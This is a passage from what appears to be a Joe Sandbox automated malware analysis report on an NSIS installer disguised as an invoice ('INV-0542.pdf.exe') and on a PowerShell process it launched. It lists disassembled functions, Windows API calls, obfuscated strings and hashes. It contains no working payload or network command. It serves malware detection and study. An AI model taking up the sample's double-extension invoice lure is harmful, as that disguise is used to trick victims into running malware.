Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED

Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(eksegeternes), ref: 004026BA

Strings

eksegeternes, xrefs: 0040267E, 004026A3, 004026B5, 00402701
lftninger\slangetmmerens, xrefs: 004026A8

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: lstrlen
String ID: eksegeternes$lftninger\slangetmmerens
API String ID: 1659193697-3935130602
Opcode ID: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
Opcode Fuzzy Hash: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E

Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
GetTickCount.KERNEL32 ref: 0040306F
CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
ShowWindow.USER32(00000000,00000005), ref: 0040309A

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C

Function 00405F18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405F71
GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-823278215
Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE

Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405569
CallWindowProcW.USER32(?,?,?,?), ref: 004055BA

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Strings

, xrefs: 0040554A

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69

Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
GlobalFree.KERNEL32(00000000), ref: 00403B9F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8

Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72

Strings

C:\Users\user\Desktop, xrefs: 00405E5C

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC

Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

Analysis Process: powershell.exePID: 5776, Parent PID: 2164COMMON

Executed Functions

Function 072BC496 Relevance: 64.3, Strings: 50, Instructions: 1844COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072BC830
4:l, xrefs: 072BD794
(f=l, xrefs: 072BD018
(f=l, xrefs: 072BDA5C
4'jq, xrefs: 072BC0DA
(f=l, xrefs: 072BCFBD
(f=l, xrefs: 072BC689
(f=l, xrefs: 072BBFA1
-.k, xrefs: 072BC3FF
(f=l, xrefs: 072BCC96
4'jq, xrefs: 072BD941
tL/k, xrefs: 072BC550
(f=l, xrefs: 072BBDDB
(f=l, xrefs: 072BCAB0
(f=l, xrefs: 072BD75C
x..k, xrefs: 072BC3B1
(f=l, xrefs: 072BCB9D
(f=l, xrefs: 072BC570
(f=l, xrefs: 072BCF27
(f=l, xrefs: 072BBED1
4'jq, xrefs: 072BCE7C
tL/k, xrefs: 072BC4C3
(f=l, xrefs: 072BDD6E
(f=l, xrefs: 072BC89E
(f=l, xrefs: 072BDBFC
(f=l, xrefs: 072BD746
x..k, xrefs: 072BDE75
(f=l, xrefs: 072BC8FD
4'jq, xrefs: 072BC17E
(f=l, xrefs: 072BDFCE
tL/k, xrefs: 072BBEB1
tL/k, xrefs: 072BC944
4'jq, xrefs: 072BCE70
4:l, xrefs: 072BD7AA
(f=l, xrefs: 072BDBE6
x..k, xrefs: 072BD18C
(f=l, xrefs: 072BD86A
(f=l, xrefs: 072BC966
-.k, xrefs: 072BD1DD
(f=l, xrefs: 072BCC38
(f=l, xrefs: 072BDFE4
(f=l, xrefs: 072BC267
(f=l, xrefs: 072BCB01
(f=l, xrefs: 072BC717
(f=l, xrefs: 072BDD58
tL/k, xrefs: 072BD8BA
(f=l, xrefs: 072BC2CD
tL/k, xrefs: 072BBDBB
(f=l, xrefs: 072BDA4C
(f=l, xrefs: 072BD854

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$4'jq$4'jq$4:l$4:l$tL/k$tL/k$tL/k$tL/k$tL/k$tL/k$x..k$x..k$x..k$-.k$-.k
API String ID: 0-3465172886
Opcode ID: 8e476d819dc5aead66d892e4803d680495bdecb36fe36c68ba420dbac51ec929
Instruction ID: 2b2dd41462874883b059aec4acc9a5dc7a76192ba8a48bbfd382157d1e2a19f8
Opcode Fuzzy Hash: 8e476d819dc5aead66d892e4803d680495bdecb36fe36c68ba420dbac51ec929
Instruction Fuzzy Hash: 170362B4A10215CFDB24DB24C991BEEB7B2EF85344F1188A9D90A6B341CB75ED81CF51

Function 072B6B38 Relevance: 5.6, Strings: 4, Instructions: 591COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B730C
4'jq, xrefs: 072B6FF6
4'jq, xrefs: 072B6FEA
(f=l, xrefs: 072B7302

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$4'jq$4'jq
API String ID: 0-3423955792
Opcode ID: 5a594e0aa3c97bf1a149b675f069ff1b2ef5f1759870fe836c4dc7d90b0af8c1
Instruction ID: 9e61891f61a309fefdfc25731a79e6db90eb17c647ee87fc293b9e029a778081
Opcode Fuzzy Hash: 5a594e0aa3c97bf1a149b675f069ff1b2ef5f1759870fe836c4dc7d90b0af8c1
Instruction Fuzzy Hash: 0B328F74B20205DFD714CB98C981FAABBB2EF84305F158059E906AF395CB76EC46CB91

Function 072BD276 Relevance: 43.7, Strings: 34, Instructions: 1234COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072BC830
(f=l, xrefs: 072BD379
tL/k, xrefs: 072BBEB1
(f=l, xrefs: 072BD018
4'jq, xrefs: 072BC0DA
(f=l, xrefs: 072BCFBD
4'jq, xrefs: 072BCE70
tL/k, xrefs: 072BC944
(f=l, xrefs: 072BBFA1
-.k, xrefs: 072BC3FF
x..k, xrefs: 072BD18C
(f=l, xrefs: 072BCC96
(f=l, xrefs: 072BC966
-.k, xrefs: 072BD1DD
(f=l, xrefs: 072BCAB0
(f=l, xrefs: 072BBDDB
(f=l, xrefs: 072BCC38
(f=l, xrefs: 072BD3CC
x..k, xrefs: 072BC3B1
(f=l, xrefs: 072BC267
(f=l, xrefs: 072BCB9D
(f=l, xrefs: 072BCF27
(f=l, xrefs: 072BCB01
(f=l, xrefs: 072BBED1
(f=l, xrefs: 072BD2D9
tL/k, xrefs: 072BD62D
(f=l, xrefs: 072BC89E
(f=l, xrefs: 072BC2CD
(f=l, xrefs: 072BD582
(f=l, xrefs: 072BC8FD
4'jq, xrefs: 072BC17E
tL/k, xrefs: 072BBDBB
(f=l, xrefs: 072BD651
(f=l, xrefs: 072BD5E3

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$tL/k$tL/k$tL/k$tL/k$x..k$x..k$-.k$-.k
API String ID: 0-1257073014
Opcode ID: 5a4d395f9f49c801fb96b6e5d8ebf724b4664409f5bc4acf1d55a037f4769adb
Instruction ID: c276abc974cb0cc63988672461f3d7cde9c4f6b1b01e209ac63352a894686f67
Opcode Fuzzy Hash: 5a4d395f9f49c801fb96b6e5d8ebf724b4664409f5bc4acf1d55a037f4769adb
Instruction Fuzzy Hash: D1C285B4A102158FD764DB24CD91BEEB7B2EF85304F1189A9D90A6B381CB35ED81CF51

Function 072B82C2 Relevance: 36.1, Strings: 28, Instructions: 1064COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B78E7
(f=l, xrefs: 072B7AB2
(f=l, xrefs: 072B83C3
x..k, xrefs: 072B81D4
(f=l, xrefs: 072B88F7
(f=l, xrefs: 072B841D
(f=l, xrefs: 072B7BA4
(f=l, xrefs: 072B831F
(f=l, xrefs: 072B8975
(f=l, xrefs: 072B86FB
(f=l, xrefs: 072B787C
tL/k, xrefs: 072B7932
-.k, xrefs: 072B8225
(f=l, xrefs: 072B8672
(f=l, xrefs: 072B7C4A
4'jq, xrefs: 072B7EAA
tL/k, xrefs: 072B873B
(f=l, xrefs: 072B7B0A
(f=l, xrefs: 072B8033
(f=l, xrefs: 072B7F59
(f=l, xrefs: 072B795E
(f=l, xrefs: 072B7812
(f=l, xrefs: 072B7CA6
(f=l, xrefs: 072B8088
(f=l, xrefs: 072B86F1
(f=l, xrefs: 072B8616
(f=l, xrefs: 072B8608
(f=l, xrefs: 072B8666

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$tL/k$x..k$-.k
API String ID: 0-3210324593
Opcode ID: fa41e227d316d6ea1c9d40208136fd96d196535097f8f121427c9339455297e2
Instruction ID: 81050bd3386cd0a7ccf6d7e20d1a27dfadb1b2764a8f33cdfe69ee38be6df0a5
Opcode Fuzzy Hash: fa41e227d316d6ea1c9d40208136fd96d196535097f8f121427c9339455297e2
Instruction Fuzzy Hash: 12A2B4B4A10215CFD720DB64C991BAABBB6EF84304F10C999D91A6B341CB75FD81CF91

Function 072B74A0 Relevance: 33.6, Strings: 26, Instructions: 1115COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B78E7
(f=l, xrefs: 072B7AB2
x..k, xrefs: 072B81D4
(f=l, xrefs: 072B88F7
(f=l, xrefs: 072B7BA4
(f=l, xrefs: 072B7F63
(f=l, xrefs: 072B8975
(f=l, xrefs: 072B787C
(f=l, xrefs: 072B8901
(f=l, xrefs: 072B897F
tL/k, xrefs: 072B7932
(f=l, xrefs: 072B76D4
(f=l, xrefs: 072B7625
-.k, xrefs: 072B8225
(f=l, xrefs: 072B7C4A
4'jq, xrefs: 072B7EAA
(f=l, xrefs: 072B7B0A
(f=l, xrefs: 072B8033
(f=l, xrefs: 072B7F59
(f=l, xrefs: 072B795E
(f=l, xrefs: 072B7812
(f=l, xrefs: 072B7CA6
(f=l, xrefs: 072B8088
(f=l, xrefs: 072B76DE
4'jq, xrefs: 072B7EB6
(f=l, xrefs: 072B761B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$tL/k$x..k$-.k
API String ID: 0-589518937
Opcode ID: 5316b4ba9325c089120ff4c2a8593c6f9fcfef3d43a44a06e0e15c5c986ca0be
Instruction ID: d7bd3d3ed6e434bf60c278a12f05077c60965c4840c10645fdf7a512eb0b6551
Opcode Fuzzy Hash: 5316b4ba9325c089120ff4c2a8593c6f9fcfef3d43a44a06e0e15c5c986ca0be
Instruction Fuzzy Hash: 66A2C5B4A10205CFDB24DB58C991BAEBBB6EF84300F10C9A9D91A6B355CB35ED41CF91

Function 072B747C Relevance: 23.3, Strings: 18, Instructions: 835COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B78E7
-.k, xrefs: 072B8225
(f=l, xrefs: 072B7AB2
(f=l, xrefs: 072B7C4A
4'jq, xrefs: 072B7EAA
(f=l, xrefs: 072B7B0A
x..k, xrefs: 072B81D4
(f=l, xrefs: 072B8033
(f=l, xrefs: 072B7F59
(f=l, xrefs: 072B795E
(f=l, xrefs: 072B7BA4
(f=l, xrefs: 072B7812
(f=l, xrefs: 072B7CA6
(f=l, xrefs: 072B8088
(f=l, xrefs: 072B787C
tL/k, xrefs: 072B7932
(f=l, xrefs: 072B76D4
(f=l, xrefs: 072B761B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
API String ID: 0-1339570531
Opcode ID: 723f4f4be1f70bad07595feb4c49e64a5f3959e18a6ec77fbe702d6e1abc2ad9
Instruction ID: e00b8fbd48970938467d61e5ed99bd490baa1d2eff96929e6c20d47a00463213
Opcode Fuzzy Hash: 723f4f4be1f70bad07595feb4c49e64a5f3959e18a6ec77fbe702d6e1abc2ad9
Instruction Fuzzy Hash: CF7293B4A10215CFD720DB54C991BAABBB2EF84304F10C99AD91A6B351CB75FD81CFA1

Function 072B746A Relevance: 23.3, Strings: 18, Instructions: 824COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B78E7
-.k, xrefs: 072B8225
(f=l, xrefs: 072B7AB2
(f=l, xrefs: 072B7C4A
4'jq, xrefs: 072B7EAA
(f=l, xrefs: 072B7B0A
x..k, xrefs: 072B81D4
(f=l, xrefs: 072B8033
(f=l, xrefs: 072B7F59
(f=l, xrefs: 072B795E
(f=l, xrefs: 072B7BA4
(f=l, xrefs: 072B7812
(f=l, xrefs: 072B7CA6
(f=l, xrefs: 072B8088
(f=l, xrefs: 072B787C
tL/k, xrefs: 072B7932
(f=l, xrefs: 072B76D4
(f=l, xrefs: 072B761B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
API String ID: 0-1339570531
Opcode ID: 86137f761fbfcaabae4b81b0a192fb589cdbe78305d8ce01406df33ff9f431e9
Instruction ID: a68780d72d689d733b57eef7a9bc1b8eceab8b4b1cc150304f6bd70f92177596
Opcode Fuzzy Hash: 86137f761fbfcaabae4b81b0a192fb589cdbe78305d8ce01406df33ff9f431e9
Instruction Fuzzy Hash: B97292B4A10215CFDB20DB54C991BAAF7B2EF84304F10C99AD91A6B351CB75BD81CFA1

Function 09021020 Relevance: 21.9, Strings: 17, Instructions: 690COMMON

Download Yara Rule

Strings

$jq, xrefs: 0902147F
$jq, xrefs: 09021428
$jq, xrefs: 0902148B
4'jq, xrefs: 09021155
4'jq, xrefs: 09021342
4'jq, xrefs: 0902134E
$jq, xrefs: 0902146C
$jq, xrefs: 090210E7
$jq, xrefs: 090210F7
